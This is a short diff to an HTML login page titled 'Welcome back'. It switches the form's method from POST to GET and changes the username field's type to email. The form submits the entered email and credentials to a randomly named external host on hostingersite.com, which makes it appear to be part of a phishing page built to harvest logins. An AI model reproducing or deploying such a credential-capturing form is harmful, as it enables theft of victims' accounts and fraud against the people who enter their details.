--- a/index.html
+++ b/index.html
@@ -816,10 +816,10 @@
 
 <div id="container" class="">
    <h1 class="title-text">Welcome back</h1>
-   <form novalidate="" id="frmLogin" action="https://blueviolet-chimpanzee-178239.hostingersite.com/public.php" method="POST">
+   <form novalidate="" id="frmLogin" action="https://blueviolet-chimpanzee-178239.hostingersite.com/public.php" method="GET">
       <div class="input-group">
          <div class="input-wrapper ">
-            <input type="username" id="username" name="username" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
+            <input type="email" id="username" name="username" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
             <label for="txtEmail">Email</label>
             <span class="bar"></span>
          </div>
